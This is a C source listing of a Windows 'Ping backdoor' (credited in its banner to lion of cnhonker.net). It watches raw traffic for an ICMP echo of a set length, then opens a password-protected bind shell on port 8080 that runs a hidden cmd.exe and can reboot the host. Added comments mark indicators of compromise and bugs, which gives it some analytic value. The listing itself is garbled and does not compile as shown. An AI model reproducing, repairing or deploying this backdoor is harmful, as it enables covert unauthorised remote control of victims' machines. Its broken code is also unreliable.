Extremely concealed source code of the ping Backdoor


Extremely concealed Ping Backdoor source code

# Include <stdio. h>

# Include <stdlib. h>

# Include <winsock2.h>

# Include <ws2tcpip. h>

# Include <mstcpip. h>

// Fixed configuration of the sample. Every value below is hard-coded, so each one is a
// static indicator: the trigger payload length, the listener port and the clear-text
// password never change between runs. (This copy of the listing is mangled - mixed case,
// spaces inside identifiers - and does not compile as shown.)

# Define ICMP_Echo 8 // The type of ICMP echo request message is 8

# Define ICMP_ECHOREPLY 0 // The type value of the ICMP echo response packet is 0

# Define sniffer_icmp_size 101 // ICMP payload length (bytes) that sniffer() treats as the trigger; frames of any other length are ignored

# Define bind_port 8080 // default bind shell Port (TCP, bound to every interface in bindshell())

# Define max_packet 10000 // size of the receive buffer handed to recvfrom() in sniffer()

# Define def_password "givemeshell! "// Default password, clear text; matched with strstr() in bindshell()

# Define xmalloc (s) heapalloc (getprocessheap (), heap_zero_memory, (s )) // zeroed allocation from the process heap; the one caller never checks or frees the result

// Define the IP Header
// Only sizeof (ipheader) is used: decode_sniffer() skips the first 20 bytes of the captured
// frame to reach what it assumes is an ICMP header. No field of this struct is ever read,
// so the IP protocol number is not checked before the payload is treated as ICMP.

Typedef struct iphdr

{

Unsigned char h_verlen; // 4-bit header length, 4-bit IP address version 1

Unsigned char TOS; // 8-bit service type TOS 1

Unsigned short total_len; // The total length of 16 bits (in bytes) 2

Unsigned short ident; // 16-bit ID 2

Unsigned short frag_and_flags; // 3-digit flag 2

Unsigned char TTL; // 8-bit TTL 1

Unsigned char proto; // 8-bit protocol (TCP, UDP, or other) 1 -- never inspected by this program

Unsigned short checksum; // 16-bit IP header checksum 2

Unsigned int sourceip; // 32-bit source IP address 4

Unsigned int destip; // 32-bit destination IP address 4

} Ipheader; // IP header length: 20

// Define the ICMP Header
// Of these fields only I _type is examined (decode_sniffer()). Checksum, id and sequence
// are never validated, so the trigger carries no authentication of any kind.

Typedef struct _ ihdr

{

Unsigned char I _type; // 8-bit type 1 -- compared against ICMP_Echo

Unsigned char I _code; // 8-bitCode1

Unsigned short I _cksum; // 16-bit checksum and 2 -- not verified

Unsigned short I _id; // identification number (identified by process number) 2 -- not verified

Unsigned short I _seq; // message serial number 2 -- not verified

} Icmpheader; // ICMP Header Length: 8

Int sniffer (); // listen to ICMP? -- raw-socket capture loop; returns only on a socket error

Void decode_sniffer (char *, Int, struct sockaddr_in *); // simple sniffer unpackProgram: reads the ICMP type and starts the shell

Int bindshell (); // bind Shell: TCP listener on bind_port wired to a hidden cmd.exe

// Arguments for the WSAIoctl (SIO_RCVALL) call in sniffer(); dwbufferinlen = 1 (RCVALL_ON)
// switches the bound interface into receive-all mode.
DWORD dwbufferlen [10];

DWORD dwbufferinlen = 1;

DWORD dwbytesreturned = 0;

// Declared for a threaded variant that is commented out in decode_sniffer(); in this
// listing bindshell() runs inline on the capture thread, so nothing is ever stored here.
Handle bindthread;

// Main icmpdoor Function
// Entry point: initialise Winsock, then block in sniffer() until it fails. argc/argv are
// never read, so there is no command-line configuration; all behaviour comes from the
// #defines above.

Int main (INT argc, char ** argv)

{

Wsadata;

Int retval;

// Socket Initialization

If (retval = wsastartup (makeword (2, 2), & wsadata ))! = 0)

{

Printf ("wsastartup failed: % d \ n", retval );

Exit (-1 );

}

// Start sniffer -- does not return while the capture loop is healthy

Sniffer ();

// Socket ends -- reached only after sniffer() returns on error

Wsacleanup ();

Return 0;

}

// Main function of sniffer
// Opens a raw IP socket on the host's own address, enables SIO_RCVALL, then reads every
// frame that arrives. The only trigger filter is the total frame length
// (sniffer_icmp_size + 28); a matching frame is handed to decode_sniffer(), which runs
// bindshell() on this same thread, so capture pauses for as long as the shell is open.
// Host indicator: a user process that creates a SOCK_RAW/IPPROTO_IP socket and issues
// SIO_RCVALL (on current Windows this requires administrative rights).

Int sniffer ()

{

Int packsize = sniffer_icmp_size;

Socket socksniffer;

Struct sockaddr_in DEST, from;

Struct hostent * HP;

Int sread;

Int fromlen = sizeof (from );

Unsigned char localname [256];

Char * recvbuf;

// Create an original socket to accept all received packets (sniffer)

If (socksniffer = wsasocket (af_inet, sock_raw, ipproto_ip, null, 0, wsa_flag_overlapped) = invalid_socket)

{

Printf ("wsasocket () failed: % d \ n", wsagetlasterror ());

Return-1;

}

// Obtain the local address -- the interface chosen is whatever the hostname resolves to first

Gethostname (char *) localname, sizeof (localname)-1 );

If (HP = gethostbyname (char *) localname) = NULL)

{

// socksniffer is not closed on this path

Return-1;

}

Memset (& DEST, 0, sizeof (DEST ));

Memcpy (& DeST. sin_addr.s_addr, HP-> h_addr_list [0], HP-> h_length); // TCP sniffing options

DeST. sin_family = af_inet;

DeST. sin_port = htons (8000); // specify any port -- a port number should have no meaning on a raw IP socket

// Socket bind -- return value not checked

BIND (socksniffer, (psockaddr) & DEST, sizeof (DEST ));

// Set socket to accept all packets
// Return value not checked: if SIO_RCVALL is refused (e.g. insufficient privilege) nothing
// is logged and the loop below still runs on the plain raw socket.

Wsaioctl (socksniffer, sio_rcvall, & dwbufferinlen, sizeof (dwbufferinlen), & dwbufferlen,

Sizeof (dwbufferlen), & dwbytesreturned, null, null );

// Allocate the socket receiving buffer size to max_packet -- result never checked or freed

Recvbuf = (char *) xmalloc (max_packet );

Printf ("sniffer OK! ");

// The size of the loop listener package

While (1)

{

// Read data -- blocks; no receive timeout is set on socksniffer in this function

Sread = recvfrom (socksniffer, recvbuf, max_packet, 0, (struct sockaddr *) & from, & fromlen );

// If an error occurs while reading data

If (sread = socket_error | sread <0)

{

// Not expected to fire here since no SO_RCVTIMEO is applied to this socket

If (wsagetlasterror () = wsaetimedout)

{

Continue;

}

Printf ("recvfrom failed: % d \ n", wsagetlasterror ());

Return-1;

}

Else

// If (sread> = 28)

// If the size of the read data = the size of the listener package + 28
// 28 = 20-byte IP header + 8-byte ICMP header (see the struct comments). Length is the
// only filter: no check of the IP protocol field, source address, ICMP id or checksum.
// Network indicator: an ICMP echo request carrying exactly sniffer_icmp_size bytes of payload.

If (sread = packsize + 28)

{

// Send the received data to the sniffer unpacking program for processing.
// The whole frame (IP header included) is passed; the length argument is the payload only.

Decode_sniffer (recvbuf, sread-28, & from );

}

}

Return 1;

}

// Simple sniffer unpacking program
// Treats byte 20 of the captured frame as an ICMP header and, if its type is an echo
// request, starts bindshell() on the calling thread. The 'bytes' and 'From' parameters
// are only used by the commented-out debug dump below; nothing about the sender is
// checked before the shell is started.

Void decode_sniffer (char * Buf, int bytes, struct sockaddr_in * From)

{

Icmpheader * icmphdr;

// The ICMP header address equals the length of the BUF + IP header: BUF + 20
// No check that the IP protocol field is ICMP: any 129-byte frame whose byte 20 equals 8
// satisfies the condition below.

Icmphdr = (icmpheader *) (BUF + sizeof (ipheader ));

/*

Printf ("\ r \ n % d bytes from % s,", bytes, inet_ntoa (from-> sin_addr); // retrieve the received data

Printf ("icmp_type: % d", icmphdr-> I _type); // check type

Printf ("icmp_seq: % d \ r \ n", icmphdr-> I _seq); // retrieve the serial number

//? Outbound data segment BUF + 28 + I

For (INT I = 0; I <bytes-1; I ++)

{

Printf ("% C", * (BUF + sizeof (ipheader) + sizeof (icmpheader) + I ));

}

*/

// If (icmphdr-> I _type = ICMP_Echo | icmphdr-> I _type = ICMP_ECHOREPLY)

// Determine if the packet is an ICMP request packet

If (icmphdr-> I _type = ICMP_Echo)

{

// Bind Shell -- runs synchronously; the capture loop in sniffer() is stalled until it returns

Bindshell ();

// Threaded variant left disabled by the author; bindthread is therefore never assigned.
// DWORD bid;

// Bindthread = createthread (null, 0, bindshell, 0, 0, & bid );

}

Else

Printf ("\ r \ n get other packets! ");

Return;

}

// Bind shell function
// Listens once on TCP bind_port (all interfaces), accepts a single client, checks the
// clear-text password, then spawns a hidden cmd.exe with stdin/stdout/stderr redirected
// through two anonymous pipes and pumps bytes between the pipes and the socket until the
// client sends EXIT, sends REBOOT, or disconnects. Returns -1 on accept/password failure,
// 1 otherwise.
// Host indicators: a TCP listener on 8080 that appears only after an ICMP echo arrives;
// a cmd.exe child of this process created with SW_HIDE and inherited pipe handles;
// ExitWindowsEx(EWX_REBOOT) issued from a non-interactive process.
// Network indicators: the banner "Ping backdoor v0.1" and the cnhonker.net URL, and the
// password itself, all travel in clear text.

Int bindshell (){

Int bport = bind_port;

Socket bindserver, getclient;

Struct sockaddr_in addrserver, addrclient;

Char buff [4096];

Char * messages = "\ r \ n ====================== Ping backdoor v0.1 ==== ===============================\ r \ n ========== code by lion.

Welcome to <a href = 'HTTP: // www.cnhonker.net 'target = _ blank> http://www.cnhonker.net </a> ===========\ r \ n ";

Char * getpass = "\ r \ n your password :";

Char * passok = "\ r \ n OK! Please enter :";

Char * nothispass = "\ r \ n sorry, your password not right. \ r \ n ";

Char * exitok = "\ r \ n exit OK! \ R \ n ";

Char * rebootok = "\ r \ n reboot now! \ R \ n ";

// Create a socket -- return value not checked

Bindserver = socket (af_inet, sock_stream, ipproto_tcp );

// Specify the server address and port

Addrserver. sin_family = af_inet;

Addrserver. sin_port = htons (bport );

Addrserver. sin_addr.s_addr = addr_any; // every interface, not just the one sniffed

// Set timeout -- 60 s receive timeout on the listening socket

Int timeout = 60000;

Setsockopt (bindserver, sol_socket, so_rcvtimeo, (char *) & timeout, sizeof (timeout ));

// Set the reuse Port -- lets the listener come back immediately on repeated triggers

Uint breuser = 1;

Setsockopt (bindserver, sol_socket, so_reuseaddr, (char *) & breuser, sizeof (breuser ));

// Listening port -- neither bind nor listen is checked

BIND (bindserver, (struct sockaddr *) & addrserver, sizeof (addrserver ));

Listen (bindserver, 2 );

Printf ("\ r \ n bind port on % d OK.", bport );

// Accept client connection

Int ilen = sizeof (addrclient );

// Receives one connection -- blocks until a client arrives

Getclient = accept (bindserver, (struct sockaddr *) & addrclient, & ilen );

If (getclient! = Invalid_socket)

{

// If there is a connection, set the delay to 60 s.

Int itimeout = 60000;

Setsockopt (getclient, sol_socket, so_rcvtimeo, (char *) & itimeout, sizeof (itimeout ));

}

Else

// bindserver is left open on this path

Return-1;

// Write welcome information -- send results are not checked

Send (getclient, messages, strlen (messages), 0 );

// WRITE password verification information

Send (getclient, getpass, strlen (getpass), 0 );

// Receive data
// As written this copy passes three arguments to recv and never NUL-terminates buff,
// so the strstr() below scans an unterminated, partly uninitialised stack buffer.

Recv (getclient, buff, 0 );

// Verify the password -- substring match, so the password can appear anywhere in the input

If (! (Strstr (buff, def_password )))

{

// If the password is incorrect, write the Password error message

Send (getclient, nothispass, strlen (nothispass), 0 );

Printf ("\ r \ n password not right! ");

Closesocket (getclient );

Closesocket (bindserver );

Return-1;

}

// Write verification information

Send (getclient, passok, strlen (passok), 0 );

// Create two anonymous Pipelines
// pipe1: cmd.exe stdout/stderr -> this process -> socket; pipe2: socket -> this process -> cmd.exe stdin

Handle hreadpipe1, hwritepipe1, hreadpipe2, hwritepipe2;

Unsigned long lbytesread;

Security_attributes SA;

SA. nlength = 12; // presumably sizeof(SECURITY_ATTRIBUTES) for a 32-bit build

SA. lpsecuritydescriptor = 0;

SA. binherithandle = true; // handles must be inheritable for the child to use them

Createpipe (& hreadpipe1, & hwritepipe1, & SA, 0 );

Createpipe (& hreadpipe2, & hwritepipe2, & SA, 0 );

Startupinfo siinfo;

Char character line [] = "cmd.exe "; // named 'cmdline' where it is used below in this copy

Process_information processinformation;

Zeromemory (& siinfo, sizeof (siinfo ));

Siinfo. dwflags = startf_useshowwindow | startf_usestdhandles;

Siinfo. wshowwindow = sw_hide; // no visible console window

Siinfo. hstdinput = hreadpipe2; // read the data written by the socket to pipe2

Siinfo. hstdoutput = siinfo. hstderror = hwritepipe1; // write data here

Printf ("\ r \ n pipe create OK! ");

// Create a cmd process that reads data from hreadpipe2 and writes data to hwritepipe1
// This copy passes five arguments to CreateProcess; the result 'bread' is never checked.
// No handle in processinformation is closed and the child is never terminated, so cmd.exe
// and the inherited pipe handles appear to outlive every return path below.

Int bread = CreateProcess (null, cmdline, null, & siinfo, & processinformation );

// Pump loop: poll the child's output pipe; when it is empty, block on the socket (60 s timeout)

While (1)

{

// Check whether data is returned in the MPs queue -- return value of PeekNamedPipe not checked

Int ret = peeknamedpipe (hreadpipe1, buff, 1024, & lbytesread );

If (lbytesread)

{

// Read data from the pipeline hreadpipe1

Ret = readfile (hreadpipe1, buff, lbytesread, & lbytesread, 0 );

If (! RET) break;

// Write the data read from the pipeline hreadpipe1 to the getclient

Ret = Send (getclient, buff, lbytesread, 0 );

If (Ret <= 0) break;

}

Else

{

// If the getclient connection receives data -- lbytesread is unsigned, so the <= 0 test only catches 0

Lbytesread = Recv (getclient, buff, 1024,0 );

If (lbytesread <= 0) break;

// Write the data read from the getclient connection to hwritepipe2
// The input is forwarded to cmd.exe first and only then inspected for control words

Ret = writefile (hwritepipe2, buff, lbytesread, & lbytesread, 0 );

// Control word EXIT: close both sockets and return (cmd.exe is not terminated)

If (lbytesread> 4 & buff [0] = 'E' & buff [1] = 'X' & buff [2] = 'I '&& buff [3] = 'T ')

{

// Write and exit Information

Send (getclient, exitok, strlen (exitok), 0 );

Closesocket (getclient );

Closesocket (bindserver );

Return 1;

}

// Control word REBOOT: the second line re-tests buff [1] and buff [2] instead of the
// remaining characters, as visible here; on match the host is rebooted via ExitWindowsEx

Else if (lbytesread> 6 & buff [0] = 'R' & buff [1] = 'E' & buff [2] = 'B '& & buff [3] = 'O '&&

Buff [1] = 'O' & buff [2] = 'T ')

{

// Write restart

Send (getclient, rebootok, strlen (rebootok), 0 );

Closesocket (getclient );

Closesocket (bindserver );

Exitwindowsex (ewx_reboot, null );

Return 1;

}

If (! RET) break;

}

}

// Reached on pipe/socket failure: sockets closed, pipes and child process left as they are

Closesocket (getclient );

Closesocket (bindserver );

Return 1;

}
